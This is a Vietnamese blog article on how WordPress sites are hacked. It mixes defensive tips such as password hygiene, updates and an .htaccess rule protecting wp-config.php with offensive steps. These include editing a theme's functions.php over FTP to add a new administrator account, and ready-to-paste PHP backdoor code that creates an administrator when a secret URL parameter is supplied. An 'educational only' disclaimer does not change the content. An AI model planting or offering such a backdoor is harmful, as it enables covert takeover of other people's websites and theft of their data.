VietNetwork.Vn

WordPress là hệ thống quản lý nội dung được sử dụng rộng rãi nhất trên thế giới. Hơn 63% các trang web được tạo cho đến nay được tạo từ CMS này, và điều này khiến nó trở thành mục tiêu ưa thích của tin tặc.

Thực tế khiến wordpress dễ bị hack nhất là nó sử dụng số lượng lớn các plugin có nguồn mở và các plugin này có thể chứa một số mã và tập lệnh độc hại cung cấp cho hacker nền tảng để đưa phần mềm độc hại vào wordpress và thực hiện các hoạt động bất chính.

WordPress là một công nghệ lớn, vì nó được sử dụng bởi ít nhất 28.183.568 trang web trực tuyến trong 2020.


Các trang web Wordpress được tính theo ngành.


Chắc chẳn bạn đang tự hỏi làm thế nào mà hacker có thể hack được một trang đăng nhập web wordpress. Trong bài đăng này, bạn sẽ biết thêm về cách WordPress bị tấn công, lý do dẫn đến việc hack trang web, các kỹ thuật hack khác nhau được sử dụng để hack trang web WordPress và các mẹo để ngăn chặn các mối đe dọa bảo mật.

Lưu ý: Mục đích của bài viết này chỉ nhằm cung cấp cho bạn thông tin cơ bản về cách xâm nhập vào trang WordPress hoặc bỏ qua đăng nhập. Hướng dẫn này chỉ dành cho mục đích giáo dục. Các kỹ thuật hack WordPress đã đề cập không nên được sử dụng để khai thác.

Tính bảo mật của trang web WordPress của bạn sẽ bị nghi ngờ khi nó bị tấn công mà không hề hay biết. Việc hack trang web có thể kéo dài hàng tháng hoặc hàng năm nếu bạn không cập nhật giao diện, plugin và CMS của mình.

Chứa một số lỗ hổng cơ bản trong các plugin, một trang web WordPress chưa được bảo mật sẽ là cánh cửa mở cho các tin tặc muốn lấy cắp dữ liệu của bạn hoặc đơn giản là làm hỏng trang web của bạn. Nó có thể dẫn đến việc tin tặc làm mất mặt trang web wordpress của bạn.

Điều quan trọng là phải cài đặt các plugin bảo mật wordpress ngay từ khi bắt đầu tạo trang web của bạn để không phải chiến đấu với các cuộc xâm nhập suốt cả năm.

Đó là lý do tại sao trong hướng dẫn này, mình sẽ cung cấp cho bạn tất cả các kỹ thuật hack và lỗ hổng khiến trang web WordPress của bạn dễ bị tấn công và các phương pháp hay nhất để đảm bảo tính bảo mật cho WordPress của bạn.

Dưới đây là những rủi ro mà doanh nghiệp của bạn gặp phải trong trường hợp này. Mặc dù, wordpress dễ bị hack nhất nhưng điều này không có nghĩa là các CMS khác đều an toàn, chúng cũng có thể bị tấn công.



1. Những tin tặc này là ai?

Các mối đe dọa chống lại trang web của bạn có thể đến từ ba nguồn khác nhau.

Đầu tiên, các rô bốt (bot). Chúng được khởi chạy từ một máy tính và sẽ nhắm mục tiêu đến nhiều trang web để gây hại. Nhanh chóng, hiệu quả, họ khai thác các lỗi bảo mật và lỗ hổng bảo mật trong các ứng dụng, plugin và giao diện nhiều nhất có thể.

Các lỗ hổng cho đến nay vẫn chưa được các nhà phát triển biết đến và sẽ phải được sửa chữa thông qua các bản cập nhật và bản vá. Các cuộc tấn công bằng bot đặc biệt hung hãn và do đó có thể dễ dàng phát hiện được.

Botnet, tương tự như bot, nhưng được khởi chạy từ một mạng máy tính bị phần mềm độc hại kiểm soát. Còn được gọi là đội quân thây ma, thiệt hại của chúng rất đáng kể vì chúng có thể gây hư hại cho nhiều địa điểm cùng một lúc.

Cuối cùng, ác độc nhất trong tất cả, cuộc tấn công của con người. Một kẻ tự nhiên đứng sau màn hình của họ tấn công trang web của bạn và tìm kiếm các yếu tố dễ bị tấn công. Kiểu tấn công này rất khó phát hiện vì con người kín đáo hơn bot hoặc mạng botnet.

Mặc dù một người chỉ có thể tấn công một trang web tại một thời điểm, nhưng cuộc tấn công của anh ta cũng không kém phần nguy hiểm. Sau đó, hacker có xu hướng nhắm mục tiêu các trang web ở quy mô lớn lưu trữ dữ liệu quan trọng mà sau khi bị đánh cắp, có thể dễ dàng bán lại với giá cao.

2. Những dấu hiệu trang web WordPress của bạn bị tấn công.

Các dấu hiệu khác của một trang web wordpress bị tấn công bao gồm nhiều loại thông báo / cảnh báo khác nhau được hiển thị bởi Google. Nên theo dõi những cảnh báo sau:

Một ngày đẹp trời bỗng nhiên bạn không thể đăng nhập vào trang quản trị WordPress của bạn.

• Google cho bạn biết rằng trang web của bạn có thể chứa các chương trình độc hại (phần mềm độc hại) hoặc trang web của bạn đã bị tấn công.

• Những truy cập và hành động đáng nghi ngờ.

• Lượng truy cập đến website bị giảm đột ngột.

• Trang web của bạn thường chậm hoặc không phản hồi.

• Trang web WordPress của bạn chuyển hướng bạn đến các trang đáng ngờ, đáng ngờ hoặc có khả năng nguy hiểm: bán thuốc, bán giấy phép CNTT, bán các dịch vụ CNTT đáng ngờ, v.v.

• Nội dung không phù hợp hoặc gian lận đã được thêm vào trang, nội dung hoặc bài viết của bạn.

• Trang chủ của trang web của bạn bị hỏng hoặ  lỗi WordPress bắt đầu xuất hiện lên trên trang web của bạn. Các tập tin và tập lệnh không xác định đã được thêm vào mã nguồn WordPress của bạn.

• Máy chủ của bạn cho bạn biết rằng một số thư được gửi từ địa chỉ email của bạn đã được xác định là email rác (spam)

• Xuất hiện kết quả tìm kiếm lạ trong Search Engine trên trang web WordPress của bạn. Quảng cáo của Google bị từ chối do phần mềm độc hại.

Nếu trang web của bạn bị tấn công hoặc bị nhiễm vi rút, điều đó có nghĩa là danh tiếng và dữ liệu của bạn đang gặp rủi ro. Điều quan trọng là không phải chờ đợi và khắc phục sự cố ngay bây giờ. Chúng ta đều biết trang web của bạn quan trọng như thế nào đối với doanh nghiệp của bạn và đó là lý do tại sao các quản trị cần tuân thủ các biện pháp bảo mật thật nghiêm ngặt.

3. Lý do hàng đầu để Hack một trang web WordPress.

Trước hết, nó không chỉ là WordPress. Tất cả các trang web trên Internet đều dễ bị tấn công.

Lý do tại sao các trang web WordPress là mục tiêu tấn công phổ biến vì nó là được sử dụng để xây dựng trang web phổ biến nhất thế giới. Ngoài ra, điều này cũng hiển nhiên từ thực tế là lượng tìm kiếm cụm từ "cách hack trang web wordpress 2021" này rất cao. Hầu hết những người dùng này là những tin tặc có đạo đức và những người mới muốn học cách hack một trang web.

Sự phổ biến rộng rãi này cung cấp cho tin tặc một cách dễ dàng để tìm thấy các trang web kém an toàn hơn để khai thác chúng.

Tin tặc có nhiều động cơ khác nhau, một số chỉ là những người mới bắt đầu học cách vận hành các trang kém an toàn.
Tin tặc thường là những kẻ độc hại chuyề phân phối phần mềm độc hại, chiếm đoạt tài nguyên lưu trữ của trang web để tấn công người khác hoặc thậm chí gửi thư rác qua Internet.


Khi tin tặc có thể vượt qua đăng nhập vào trang web wordpress của bạn, anh ta có thể thực hiện nhiều loại hoạt động độc hại như:

• Đánh cắp dữ liệu tài chính từ trang thương mại điện tử được xây dựng trong woocommerce.
• Giả mạo các trang web wordpress để mua vui hoặc tống tiền.
• Chèn các cửa hậu để đưa các sản phẩm dược phẩm bất hợp pháp vào trang web wordpress.
• Gửi email spam.
• Lây nhiễm phần mềm độc hại vào trang web thông qua các tập lệnh độc hại tạo điều kiện cho việc tải xuống phần mềm độc hại / phần mềm có khả năng gây hại trên máy tính của người dùng.
• Sử dụng các kỹ thuật SEO mũ đen như tiêm Spam Links, SEO Spam, hack từ khóa tiếng Nhật (thêm các trang spam với từ khóa tiếng Nhật để tăng thứ hạng seo trên google.)

4. Những lý do hàng đầu dẫn đến việc WordPress bị tấn công.

Chúng ta hãy xem một số lý do hàng đầu khiến các trang web WordPress bị tấn công và cách ngăn trang web của bạn bị tấn công.

4.1. Lưu trữ web không an toàn.

Giống như tất cả các trang web, các trang web WordPress được lưu trữ trên một máy chủ web. Một số công ty lưu trữ bỏ qua tính bảo mật của nền tảng lưu trữ của họ. Điều này đặc biệt thường xảy ra đối với các máy chủ miễn phí, không giới hạn hoặc giá rẻ.


Điều này có thể dễ dàng tránh được bằng cách chọn một nhà cung cấp dịch vụ lưu trữ wordpress tốt nhất cho trang web của bạn.

Đảm bảo rằng trang web của bạn được lưu trữ trên một nền tảng an toàn với các máy chủ được định cấu hình đúng cách có thể chặn hầu hết các cuộc tấn công phổ biến nhất trên các trang web WordPress.

4.2. Mật khẩu yếu.

Mật khẩu là chìa khóa cho trang web WordPress của bạn. Bạn cần đảm bảo rằng bạn đang sử dụng một mật khẩu mạnh duy nhất cho mỗi tài khoản sau đây vì chúng đều có thể cung cấp cho hacker toàn quyền truy cập vào trang web của bạn.

• Tài khoản quản trị WordPress của bạn.
• Tài khoản bảng điều khiển lưu trữ web của cPanel.
• Tài khoản FTP.
• Cơ sở dữ liệu MySQL được sử dụng cho trang web WordPress của bạn.
• Tài khoản email được sử dụng cho tài khoản lưu trữ hoặc quản trị WordPress.

Tất cả các tài khoản này đều được bảo vệ bằng mật khẩu. Sử dụng mật khẩu yếu khiến tin tặc dễ dàng bẻ khóa mật khẩu bằng các công cụ hack cơ bản.

Bạn có thể dễ dàng tránh điều này bằng cách sử dụng mật khẩu mạnh và duy nhất cho mỗi tài khoản.

4.3. Quyền truy cập không được bảo vệ vào quản trị WordPress (thư mục wp-admin)

Khu vực quản trị WordPress cho phép người dùng truy cập vào các hành động khác nhau trên trang web WordPress của bạn. Nó cũng là khu vực bị tấn công nhiều nhất của một trang WordPress.

Để nó không được bảo vệ cho phép tin tặc thử các cách tiếp cận khác nhau để bẻ khóa trang web của bạn. Bạn có thể gây khó khăn cho họ bằng cách thêm các lớp xác thực vào thư mục quản trị WordPress của mình.

Trước hết, bạn cần bảo vệ khu vực quản trị WordPress của mình bằng mật khẩu. Điều này bổ sung thêm một lớp bảo mật và bất kỳ ai cố gắng truy cập vào quản trị WordPress sẽ cần cung cấp mật khẩu bổ sung.

Nếu bạn đang chạy một trang web WordPress nhiều tác giả hoặc nhiều người dùng, bạn có thể áp dụng mật khẩu mạnh cho tất cả người dùng trên trang web của mình.

Bạn cũng có thể thêm xác thực hai yếu tố để khiến tin tặc càng khó truy cập vào khu vực quản trị WordPress của bạn.

4.4. Quyền đối với tập tin không chính xác.

Quyền đối với tập tin là một tập hợp các quy tắc được sử dụng bởi máy chủ web của bạn. Các quyền này giúp máy chủ web của bạn kiểm soát quyền truy cập vào các tập tin trên trang web của bạn. Quyền đối với tập tin / thư mục không chính xác có thể cho phép kẻ tấn công ghi và sửa đổi quyền truy cập vào các tập tin này.

Tất cả các tập tin WordPress của bạn phải có giá trị là 644 làm quyền đối với tập tin. Tất cả các thư mục trên trang web WordPress của bạn phải có quyền 755.

4.5. Không cập nhật WordPress.

Một số người dùng WordPress ngại cập nhật các trang web WordPress của họ, sợ rằng nó sẽ làm suy giảm hoạt động của trang web của họ. Mỗi phiên bản mới của WordPress đều sửa các lỗi và lỗ hổng bảo mật.


Nếu bạn không cập nhật WordPress, bạn đang cố tình để trang web của mình dễ bị tấn công.

Nếu bạn lo lắng rằng bản cập nhật sẽ phá vỡ trang web của mình, bạn có thể tạo một bản sao lưu WordPress đầy đủ trước khi bắt đầu cập nhật.

Bằng cách đó, nếu điều gì đó không hoạt động, bạn có thể dễ dàng quay lại phiên bản trước đó.

4.6. Các plugin hoặc giao diện chưa được vá.

Cũng giống như phần mềm WordPress chính, plugin và bảo mật giao diện wordpress cũng rất quan trọng. Sử dụng một plugin hoặc giao diện lỗi thời có thể khiến trang web của bạn dễ bị tấn công. Bạn có thể tìm thấy các giao diện đa năng wordpress an toàn mới nhất tại đây.

Các lỗi và lỗi bảo mật thường được phát hiện trong các plugin và giao diện WordPress. Thông thường, các tác giả giao diện và plugin sẽ sửa chúng nhanh chóng. Tuy nhiên, nếu người dùng không cập nhật giao diện hoặc plugin của họ, họ không thể làm gì với nó.

Đảm bảo luôn cập nhật giao diện và plugin WordPress của bạn và đảm bảo quét các giao diện wordpress của bạn trước khi thực hiện cài đặt mới của giao diện WP nulled.

Các plugin WP dễ có lỗ hổng bảo mật. Điều quan trọng là bạn phải cập nhật nó thường xuyên cho website của mình. Các lỗ hổng trong các plugin từng được biết đến.

• Lỗ hổng nghiêm trọng trong plugin WordPress Contact Form 7
• Lỗ hổng SQL Injection trong WordPress Ninja Forms Plugin
• Lỗ hổng bảo mật Zero Day trong Rich Reviews Plugin
• Lỗ hổng trong Convert Plus WordPress Plugin

4.7. Sử dụng FTP thay vì SFTP / SSH.

Tài khoản FTP được sử dụng để tải tập tin lên máy chủ web của bạn bằng ứng dụng khách FTP. Hầu hết các máy chủ web đều hỗ trợ kết nối FTP bằng các giao thức khác nhau. Bạn có thể kết nối qua FTP, SFTP hoặc SSH.

Khi bạn kết nối với trang web của mình bằng FTP đơn giản, mật khẩu của bạn sẽ được gửi đến máy chủ mà không cần mã hóa. Nó có thể bị theo dõi và dễ dàng bị đánh cắp. Thay vì sử dụng FTP, bạn nên luôn sử dụng SFTP hoặc SSH.

Bạn sẽ không cần phải thay đổi ứng dụng FTP của mình. Hầu hết các ứng dụng khách FTP có thể kết nối với trang web của bạn thông qua cả SFTP và SSH. Bạn chỉ cần thay đổi giao thức thành "SFTP - SSH" khi kết nối với trang web của mình.

Bạn cũng có thể sử dụng trình quản lý tập tin có sẵn trong cPanel của mình. Nó là một công cụ trực quan và mạnh mẽ có đặc điểm là cung cấp chức năng nén / giải nén (Zip / unzip) trên máy chủ.

4.8. Sử dụng Admin làm tên người dùng WordPress.

Sử dụng "admin" làm tên người dùng WordPress không được khuyến khích. Nếu tên người dùng quản trị của bạn là admin, bạn nên ngay lập tức thay đổi tên người dùng đó thành tên người dùng khác.

4.9. Các giao diện và plugin lỗi thời.

Nhiều trang web trên Internet phân phối các plugin trả phí và các giao diện WordPress miễn phí. Đôi khi bạn rất dễ bị cám dỗ khi sử dụng các plugin và giao diện miễn phí này cho trang web của mình.

Tải xuống các giao diện và plugin WordPress từ các nguồn không đáng tin cậy là rất nguy hiểm. Chúng không chỉ có thể xâm phạm tính bảo mật của trang web của bạn mà còn có thể được sử dụng để lấy cắp thông tin nhạy cảm.

Bạn nên luôn tải xuống các plugin và giao diện WordPress từ các nguồn có uy tín như trang web của nhà phát triển plugin / giao diện hoặc các kho lưu trữ chính thức của WordPress.

Nếu bạn không đủ khả năng hoặc không muốn mua một plugin hoặc giao diện cao cấp, luôn có các lựa chọn thay thế miễn phí cho các sản phẩm này. Các plugin miễn phí này có thể không hoạt động tốt như các plugin trả phí của chúng, nhưng chúng sẽ hoàn thành công việc và quan trọng hơn là giữ an toàn cho trang web của bạn.

4.10. Không bảo mật cấu hình WordPress trong tập tin wp-config.php

Tập tin cấu hình wp-config.php của WordPress chứa thông tin kết nối cơ sở dữ liệu WordPress của bạn. Nếu bị xâm phạm, nó sẽ tiết lộ thông tin có thể cung cấp cho hacker toàn quyền truy cập vào trang web của bạn.

Bạn có thể thêm một lớp bảo vệ bổ sung bằng cách từ chối quyền truy cập vào tập tin wp-config bằng cách sử dụng .htaccess. Chỉ cần thêm mã nhỏ này vào tập tin .htaccess của bạn.

<files wp-config.php>
order allow,deny
deny from all
</files>
4.11. Không thay đổi tiền tố bảng trong cơ sở dữ liệu WordPress.

Nhiều chuyên gia khuyên bạn nên thay đổi tiền tố bảng trong cơ sở dữ liệu WordPress mặc định. Theo mặc định, WordPress sử dụng wp_ làm tiền tố cho các bảng được tạo trong cơ sở dữ liệu của bạn. Bạn có một tùy chọn để thay đổi nó trong khi cài đặt.

Bạn nên sử dụng tiền tố phức tạp hơn một chút. Điều này sẽ khiến tin tặc khó đoán tên các bảng cơ sở dữ liệu của bạn hơn.

5. Làm thế nào để tấn công một trang web WordPress.

Tùy thuộc vào mục tiêu của nó, một cuộc tấn công độc hại sẽ mở đường cho các khả năng khác nhau trong việc tấn công trang web WordPress của bạn.

Dưới đây là các cuộc tấn công và phương pháp thường xuyên nhất liên quan đến các trang web được tạo bởi WordPress.

5.1. Tạo người dùng FTP mới.

Khi HTTP nằm ngoài tầm với của tin tặc, chúng sẽ cố gắng truy cập vào máy chủ FTP và tạo quyền quản trị mới. Để tạo tài khoản bên ngoài môi trường quản trị WordPress, tất cả những gì hacker cần là quyền truy cập FTP vào trang web.

Với tư cách là quản trị, anh ta sẽ có tất cả thông tin cần thiết để kết nối với máy chủ và do đó tạo tài khoản người dùng mới bằng cách tạo một chức năng mới bằng cách sử dụng giao diện của bạn.

5.2. Tấn công tập tin functions.php

Có hai cách để tiếp cận điều này, thứ nhất bằng cách chỉnh sửa funtions.php thông qua cPanel và thứ hai bằng cách sử dụng một ứng dụng khách FTP để đạt được điều này. Sử dụng cPanel, tin tặc mở File Manager và tìm thư mục giao diện đang hoạt động.

Từ đó, nó sẽ chuyển đến thư mục public_html/wp_content/themes và tìm giao diện. Tất cả những gì còn lại là mở tập tin của anh ấy và chỉnh sửa functions.php.

Mã phải được thêm vào trước thẻ đóng và quá trình hack được thực hiện. Đừng quên thay đổi mật khẩu. Khi tài khoản mới được tạo, tin tặc sẽ xóa mã khỏi tập tin functions.php.

5.3. Sử dụng cPanel / MySQL.

Sử dụng phương pháp này để thay đổi mật khẩu (hoặc tên người dùng nếu cần) của người dùng hiện có hoặc để tạo tài khoản mới. Bạn sẽ cần quyền truy cập cPanel hoặc truy cập trực tiếp MySQL vào cơ sở dữ liệu của trang web. Hãy bắt đầu bằng cách thay đổi mật khẩu của người dùng hiện có.

Nếu bạn đang sử dụng cPanel, hãy đăng nhập (cPanel luôn có thể được truy cập thông qua liên kết   Đăng nhập để xem liên kết), tìm và mở phpMyAdmin. Danh sách cơ sở dữ liệu và bảng ở bên trái. Bạn đang tìm kiếm bảng kết thúc bằng  _users. Có thể là như wp_users, nhưng nếu bạn có nhiều hơn một trang web WordPress được cài đặt trên máy chủ, bạn phải tìm đúng.

Bảng bên phải sẽ có người dùng bạn muốn chỉnh sửa trong đó. Làm theo quy trình tương tự nếu bạn đang kết nối với MySQL thông qua một số ứng dụng khách bên ngoài như SQLyog. Khi bạn định vị bảng và bản ghi người dùng thực, đã đến lúc thay đổi mật khẩu.

Như bạn có thể đã tìm ra bây giờ, mật khẩu được lưu trong trường user_pass, được băm bằng thuật toán MD5. Mở trình tạo MD5 trực tuyến, nhập mật khẩu bạn muốn sử dụng và nhấp vào "Hash". Sao chép chuỗi đã tạo và thay thế mật khẩu ban đầu bằng nó. Trong phpMyAdmin, bạn có thể chỉnh sửa trường bằng cách nhấp đúp vào trường đó. Quy trình tương tự như các máy khách MySQL khác. Lưu các thay đổi và đăng nhập vào WordPress bằng mật khẩu mới của bạn.

5.4.Tạo tài khoản người dùng WordPress mới qua FTP.

Tài khoản FTP thường được sử dụng bởi những người dùng muốn tạo một khu vực thông qua một thư mục trong trang web của họ để cho phép tải lên và tải xuống các tập tin cho một số người nhất định bằng tên người dùng và mật khẩu mà họ tự gán.

Tất cả các tập tin được xuất bản trong khu vực này cũng có thể được nhìn thấy từ internet bằng tên miền và thư mục được sử dụng.

Để tạo Tài khoản FTP trên trang web của bạn, hãy truy cập bảng điều khiển của bạn trên biểu tượng "Tài khoản FTP". Trong phần này, bạn có thể cấu hình quyền truy cập vào một khu vực cụ thể trên trang web của mình để tải lên hoặc tải xuống tập tin.

Nhập dữ liệu vào trường được yêu cầu.

• Người dùng hoặc Đăng nhập: Tên người dùng của tài khoản FTP mới.
• Mật khẩu: Mật khẩu bạn muốn gán cho tài khoản này để truy cập qua FTP
• Thư mục: Thư mục trong trang web có thể được truy cập qua FTP, tự động giống như người dùng không có @mydomain.com, nhưng nó có thể được thay đổi. Thư mục này sẽ được tạo tự động nếu nó chưa được tạo. Nếu trường này được để trống, tài khoản FTP mới sẽ có thể truy cập vào tất cả các thư mục trong trang web. Nó không được khuyến khích, vì vậy mình khuyên bạn chỉ nên cho phép truy cập vào thư mục public_html, ví dụ: nếu bạn muốn cho phép truy cập vào trang web của bạn Để nhà thiết kế web của bạn tải lên các tập tin và thư mục tương ứng với trang web của bạn, mà không thể truy cập bằng dữ liệu chính của tài khoản của bạn, hãy ghi vào thư mục public_html.
• Quota: Đây là dung lượng tính bằng Mb mà bạn muốn gán cho thư mục này, nó có thể không giới hạn hoặc đặt giới hạn dung lượng để không chiếm hết tài nguyên trong hosting của bạn.
• Bây giờ chỉ cần nhấn nút Tạo để tạo tài khoản FTP mới.

Người dùng tài khoản FTP mới phải truy cập trang web qua FTP bằng một chương trình và với dữ liệu sau:

• Địa chỉ / Tên máy chủ / Địa chỉ:   Đăng nhập để xem liên kết hoặc   Đăng nhập để xem liên kết
• Người dùng / Người dùng: [email protected]
• Mật khẩu: Mật khẩu khác được gán cho tài khoản FTP này
• Cổng: 21

Với điều này, bạn sẽ chỉ nhập thư mục được chỉ định trong trang web của mình để tải lên và tải xuống tập tin.
Người dùng mới sẽ có quyền đọc và ghi cả trên thư mục đã chọn và trên tất cả các thư mục con mà nó chứa.

Ví dụ: nếu bạn tạo người dùng khách và cấp cho anh ta quyền truy cập vào /home/user /public_html/client (   Đăng nhập để xem liên kết), người dùng đó có thể thêm, xóa, chỉnh sửa, v.v. . tất cả các tập tin trong /home/user /public_html/client (   Đăng nhập để xem liên kết) và bất kỳ thư mục con nào có trong thư mục client (ví dụ: /home/user /public_html/client/images >>   Đăng nhập để xem liên kết).

Lưu ý: Trong thông tin được cung cấp, hãy thay đổi   Đăng nhập để xem liên kết thành tên miền của riêng bạn.
Tạo tài khoản người dùng mới trên WordPress rất dễ dàng. Với tư cách là quản trị, bạn cần điều hướng đến trang quản trị Người dùng, nơi bạn có thể tạo tài khoản mới cho bất kỳ vai trò người dùng nào. Điều đó có thể được thực hiện trong vài giây và người dùng mới được tạo có thể đăng nhập ngay lập tức bằng tên người dùng và mật khẩu đã cho.

Tạo tài khoản người dùng WordPress mới qua FTP:

• Mở ứng dụng FTP và kết nối với tài khoản của bạn.
• Điều hướng đến /wp-content/themes.
• Mở thư mục của giao diện bạn đang sử dụng.
• Tìm kiếm tập tin functions.php và chỉnh sửa nó.
• Sao chép và dán hàm sau.

function admin_account(){

$user = 'Username';

$pass = 'Password';

$email = '[email protected]';

if ( !username_exists( $user )  && !email_exists(

$email ) ) {

$user_id = wp_create_user( $user, $pass, $email );

$user = new WP_User( $user_id );

$user->set_role( 'administrator' );

} }

add_action('init','admin_account');

• Thay đổi tên người dùng, mật khẩu và email thành một cái gì đó độc đáo của riêng bạn.
• Lưu thay đổi.

6. Kỹ thuật khai thác lỗ hổng được sử dụng để Hack WordPress.

6.1. Các cuộc tấn công Man-in-the-Middle.

Người dùng có thể tận dụng các cuộc tấn công trung gian chống lại những người dùng chung mạng LAN. Miễn là thông tin đăng nhập không được mã hóa bằng đường hầm VPN hoặc mã khác như HTTPS, thông tin đăng nhập sẽ có thể được nhìn thấy dưới dạng văn bản thuần túy. Phần mềm chủ yếu cho phép người dùng thực hiện kiểu tấn công này có thể tấn công các plugin, xác định các giao diện dễ bị tấn công và liệt kê người dùng.

6.2. Brute force.

Bots sẽ thử nhiều cách kết hợp tên người dùng và mật khẩu của bạn. Phương pháp này là cách dễ nhất để tin tặc truy cập vào trang web của bạn. Các plugin giúp bạn có thể ngăn chặn các kiểu tấn công Brute force. Yêu cầu xác thực hai yếu tố cũng làm giảm nguy cơ bị hack.

6.3. Tấn công XSS trong WordPress.

Chúng đưa các mã JavaScript độc hại vào các trang trong WordPress của bạn. Bằng cách này, họ có thể truy xuất các cookie được lưu trong phiên của người dùng. Sau đó, họ có thể mạo danh người dùng bằng cách tự nhận mình là người như vậy. Cài đặt tường lửa giúp bạn có thể tránh được kiểu tấn công này và nhiều vấn đề cho khách hàng của bạn.

6.4. Các cuộc tấn SQL.

Chúng nhằm mục đích làm giảm hiệu suất của một trang web, đánh cắp dữ liệu hoặc thậm chí xóa hoặc làm hỏng nó. Đơn đặt hàng được đưa vào các trường đầu vào của trang web của bạn (ví dụ: trang nhận dạng). Cần phải kiểm tra tường lửa để xóa vĩnh viễn dữ liệu nhạy cảm.

6.5. Backdoor Injection.

Khi tin tặc nhận thấy rằng cửa trước bị đóng, chúng cố gắng truy cập vào cửa sau. Nghe có vẻ như là một cách độc hại để sử dụng mã để truy cập và kiểm soát trang web, nhưng đôi khi ngay cả chủ sở hữu trang web cũng sử dụng kỹ thuật này để kiểm soát trang web của họ. Sẽ có trường hợp cửa trước sẽ không được mở để tin tặc truy cập vào trang WordPress của bạn, nhưng sau đó cửa sau có thể dễ bị tấn công và tin tặc sẽ cố gắng truy cập trực tiếp.

Điều này chủ yếu xảy ra khi có một chút mã ẩn đằng sau môi trường WordPress của bạn và tin tặc có thể truy cập trang WordPress với quyền của quản trị. Thông tin này có thể bị xóa và các bản sao lưu có thể được khôi phục hàng nghìn lần, nhưng thường thì chủ sở hữu không biết gì về các mục cửa hậu.

Tạo cửa hậu trong WordPress. Đây là một đoạn mã bạn sẽ cần để hoàn thành công việc.

• Mở tập tin functions.php
• Sao chép / Dán mã sau.

add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
If ($_GET['backdoor'] == 'how to hack wordpress') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

• Lưu thay đổi.

Nếu bạn để nguyên mã, tất cả những gì bạn phải làm để tạo quản trị mới trên trang web là truy cập   Đăng nhập để xem liên kết to hack wordpress

6.6. Tấn công tiền điện tử, khai thác tiền điện tử.

Sự ra đời của tiền điện tử và cơn sốt Bitcoin đã tạo ra các mối đe dọa mới như crypto jacking, còn được gọi là khai thác tiền điện tử độc hại. Tin tặc giới thiệu phần mềm để làm hỏng hệ thống và tài nguyên của máy tính (PC, điện thoại thông minh, máy chủ, v.v.), để khai thác tiền điện tử trong nền và tạo ra lợi nhuận theo cách ẩn.

Ký tự tiếng Nhật trong trang WordPress.


Trong một cuộc tấn công từ khóa tiếng Nhật, văn bản tiếng Nhật được tạo tự động bắt đầu xuất hiện trên trang web của bạn. Đây kỹ thuật SEO Blackhat hijacks kết quả tìm kiếm của Google bằng cách hiển thị từ Nhật Bản trong tiêu đề và mô tả của trang bị nhiễm. Điều này xảy ra khi các trang web khác nhau được hiển thị cho các công cụ tìm kiếm và khách truy cập bình thường. Cuộc tấn công này còn được gọi là "Hack từ khóa tiếng Nhật", "Spam tìm kiếm tiếng Nhật" hoặc "Spam biểu tượng tiếng Nhật".

6.7. Lừa đảo (Phishing)

Phishing là một trong những thuật ngữ hack phổ biến nhất được các nhân viên bảo mật sử dụng. Đây là một kỹ thuật đánh lừa người dùng tiết lộ thông tin nhạy cảm (như tên người dùng, mật khẩu hoặc dữ liệu thẻ tín dụng) cho các nguồn dường như vô hại.

Kẻ lừa đảo ngụy trang thành một thực thể đáng tin cậy và liên hệ với các nạn nhân tiềm năng yêu cầu họ tiết lộ thông tin. Thông tin này có thể được sử dụng cho các mục đích xấu.

Ví dụ: kẻ lừa đảo có thể giả danh một ngân hàng và yêu cầu thông tin đăng nhập tài khoản ngân hàng của người dùng qua email. Nó cũng có thể lừa bạn nhấp vào một liên kết lừa đảo.

Để biết cách tự bảo vệ mình, bạn phải hiểu tấn công lừa đảo là gì, các loại và cách bạn có thể nhận ra nó cũng như cách xóa lừa đảo khỏi trang WordPress. Hãy tiếp tục đọc, sẽ giúp bạn tránh các vấn đề bảo mật phát sinh từ cuộc tấn công này.

6.8. Mã độc (Malware)

Bạn nghe thấy các trang web bị nhiễm phần mềm độc hại tấn công hàng ngày, vì vậy chúng ta hãy hiểu rõ hơn về thuật ngữ hack này.

Phần mềm độc hại là phần mềm được thiết kế bởi tin tặc để chiếm quyền điều khiển hệ thống máy tính hoặc đánh cắp thông tin nhạy cảm từ một thiết bị. Chúng có nhiều tên khác nhau như vi rút, phần mềm quảng cáo, phần mềm gián điệp, keylogger, v.v. Phần mềm độc hại có thể được chuyển vào hệ thống thông qua nhiều phương tiện khác nhau như USB, ổ cứng hoặc thư rác.

Một phần mềm độc hại rất phổ biến đang rình rập vào năm 2021 là phần mềm độc hại WP-VCD và phần mềm độc hại chuyển hướng chuyển hướng trang web của bạn đến trang web spam.

Ví dụ: một phần mềm độc hại gần đây đã hoạt động bằng cách chuyển hướng các trang web WP trên máy tính để bàn và thiết bị di động Opencart và Magento đến các liên kết độc hại. Điều này thực chất dẫn đến mất khách hàng, danh tiếng và hơn hết là tác động xấu đến thứ hạng của các công cụ tìm kiếm.

Kiểm tra các hướng dẫn đầy đủ này để khắc phục các trang web WordPress bị nhiễm phần mềm độc hại.

• Danh sách kiểm tra loại bỏ phần mềm độc hại trong WordPress.
• Quét mã độc hại trong giao diện WordPress của bạn.

6.9. Ransomware WordPress.

Một trong những thuật ngữ hack được nghiên cứu nhiều nhất năm 2017. Ransomware là một dạng phần mềm độc hại chặn quyền truy cập của người dùng vào hệ thống của chính họ và cắt quyền truy cập vào các tập tin của họ. Thông báo đòi tiền chuộc được hiển thị cho biết số tiền và địa điểm thanh toán, thường được yêu cầu bằng bitcoin, để khôi phục các tập tin của bạn.

Các cuộc tấn công này không chỉ ảnh hưởng đến các cá nhân mà còn cả các ngân hàng, bệnh viện và các doanh nghiệp trực tuyến. Một ví dụ rất gần đây về kiểu đòi tiền chuộc này là cuộc tấn công Petya gần đây đã khiến các doanh nghiệp trên khắp thế giới phải hứng chịu cơn bão.

6.10. Cross-site scripting (XSS)

Tin tặc sử dụng phương pháp này khởi động các cuộc tấn công XSS bằng cách đưa nội dung vào một trang, làm hỏng trình duyệt của mục tiêu.

Do đó, một hacker có thể sửa đổi trang web theo mong muốn của mình, đánh cắp thông tin trên cookie, cho phép anh ta chiếm quyền điều khiển các trang web theo ý muốn để khôi phục dữ liệu nhạy cảm hoặc đưa mã độc hại mà sau đó sẽ được thực thi.

6.11. Clickjacking.

